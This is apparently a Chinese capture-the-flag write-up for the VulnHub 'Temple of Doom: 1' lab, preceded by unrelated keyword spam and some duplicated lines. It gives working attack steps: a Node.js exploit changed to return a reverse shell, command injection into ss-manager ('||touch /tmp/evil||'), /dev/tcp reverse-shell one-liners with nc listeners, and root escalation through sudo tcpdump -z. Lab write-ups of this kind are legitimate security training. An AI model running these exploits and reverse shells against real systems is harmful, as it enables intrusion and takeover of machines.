北京网站开发教师招聘,哪里可以做足球网站,重庆是哪个省的城市哪个市,赣州做网站j下载链接#xff1a;
Temple of Doom: 1 ~ VulnHub 下载完成后直接在vxbox中导入即可#xff0c;网络链接模式根据自身情况而定#xff08;我采用的桥接模式#xff09;
正文#xff1a;
先用nmap进行扫描靶机ip
nmap -sn 192.168.1.1/24 对192.168.1.5进行端口探测
Temple of Doom: 1 ~ VulnHub 下载完成后直接在vxbox中导入即可网络链接模式根据自身情况而定我采用的桥接模式
正文
先用nmap进行扫描靶机ip
nmap -sn 192.168.1.1/24 对192.168.1.5进行端口探测并将结果保存到Temple文件夹下命名为port
nmap -p- 192.168.1.5 -r -PN -oA Temple/port -p-对所有端口进行探测 -PN用于禁用主机发现。这些参数告诉Nmap不要执行主机存活检测而是直接扫描指定的目标 -oA输出到指定位置 -r连续扫描端口并在扫描过程中随机排序目标端口。这可以帮助减少被网络防御系统检测到的风险。
nmap -p 22,666 192.168.1.5 -sC -sV -r -O --version-all -A -oA Temple/server -p对指定的端口进行探测 -sV版本信息 -sC默认脚本扫描 -A启动Os检测版本检测脚本扫描和traceroute -O探测操作系统信息 --version-all尽可能多的探测信息 我们发现并没有80端口 但是666端口为http服务并且是node.jsjava运行环境 对666端口进行访问 除了这个就没有其他提示 使用bp抓包看能不能有发现 发现给到的cookie可能有猫腻进行了加密 将cookie进行base64解码 得到信息 {username:Admin,csrftoken:u32t4o3tb3gg431fs34ggdgchjwnza0l,Expires:Friday, 13 Oct 2018 00:00:00 GMT} 该数据目前来说并没有多大作用 获取shell 根据nmap结果 在kali中搜索nodejs漏洞看有没有可以用来利用的poc searchsploit nodejs 符合我们要求的就是这个49552.py将该文件复制出来并进行查看
searchsploit nodejs -m 49552 cat 49552.py 对该exp进行修改
vim 49552.py 将url改为靶场host并将反弹shell改为kali机的ip以及端口 保存退出 新建窗口并对修改后的端口进行监听我这里改为了8080 nc -lvvp 8080 python2 49552.py #python3运行会因为兼容问题报错 回到nc监听窗口反弹shell成功 查找具有suid权限的文件看能否进行提权 find / -perm -us -type f 2/dev/null 经过一番查看以及对计划任务查看并没有我们可以利用的东西 但是我们在家目录发现了另一个用户 我们查看下该用户的进程有没有可以利用的东西 提权
ps aux | grep fireman 经过查询该文件为多用户管理面板并且有任意代码执行漏洞 详情可以看这篇文章【漏洞预警】 SHADOWSOCKS-LIBEV 命令执行漏洞|NOSEC安全讯息平台 - 白帽汇安全研究院 在当前shell中 用nc监听本地的8839端口(UDP)不是返回到kali新窗口中
nc -u 127.0.0.1 8839 使用一下命令进行尝试看是否生效该命令如果执行成功会在/tmp目录下创建evil文件
add: {server_port:8003, password:test, method:||touch /tmp/evil||} 命令执行成功 因为该文件ss-manager为fireman用户所有所以我们可以利用该漏洞再次进行反弹shell操作 这样我们就可以获取到fireman用户
更改代码后方的创建文件命令替换为反弹shell命令进行尝试 在kali中打开新窗口进行监听未被占用的端口
nc -lvvp 7789 在刚才的shell窗口输入
add: {server_port:8003, password:test, method:||sh -i /dev/tcp/192.168.1.4/7789 01||} (不要忘记该代码后的 “ || ”) 反弹成功并且用户为fireman 查看可以root权限运行的文件之前用户并不具有该权限
sudo -l 发现该文件具有tcpdump权限可以在该网站中查询使用方法以及其他命令的提权方式。包括但不仅限于suid、sudoGTFOBins根据内容我们来进行提权$符号为变量符号需要我们根据自己的需求进行更改 该提权方法同样也是通过反弹shell进行提权 先在文件中写入反弹shell同样需要一个未被占用的端口进行监听 将文件写入到/tmp目录下该目录下通常权限较高
echo sh -i /dev/tcp/192.168.1.4/2233 01 /tmp/shell.sh 并给该文件运行权限
chmod x shell.sh 利用tcpdump文件进行运行需要提前打开nc对2233端口进行监听
nc -lvvp 2233 我们需要对提供的命令进行小幅度修改
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root 改为
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root 解释网络接口 (-i参数)第一个命令(sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root)使用的是lo本地回环网络接口进行数据包捕获而第二个命令(sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root)使用的是eth0网络接口进行数据包捕获。eth0一般是指物理网卡接口而lo是指本地回环接口用于本地通信 所以我们采用修改后的命令
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root 提权成功
用修改前的命令同样可以提权成功但是原理比较复杂 同样打开nc监听2233端口
nc -lvvp 2233 打开fireman窗口这次我们输入第一条命令
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root 此时两个窗口都没有反应返回到我们最初的用户窗口 即该窗口我们可以看到当我们使用ss-manager文件进行反弹shell时并没有返回”ok“然后我们需要将fireman的shell断开ctrlc该位置才会返回”ok“ 此时我们再返回到最后的监听窗口会发现反弹shell成功 具体的原理我还是跟模糊希望有大佬可以解答一下我个人猜测应该是我们第一次反弹fireman用户的shell时没有断开就再次利用该用户反弹root的shell会造成一个占用吧.....所以nc会一直进行监听但是fireman用户因为是占用状态所以没有办法进行反弹个人猜测希望大佬指正
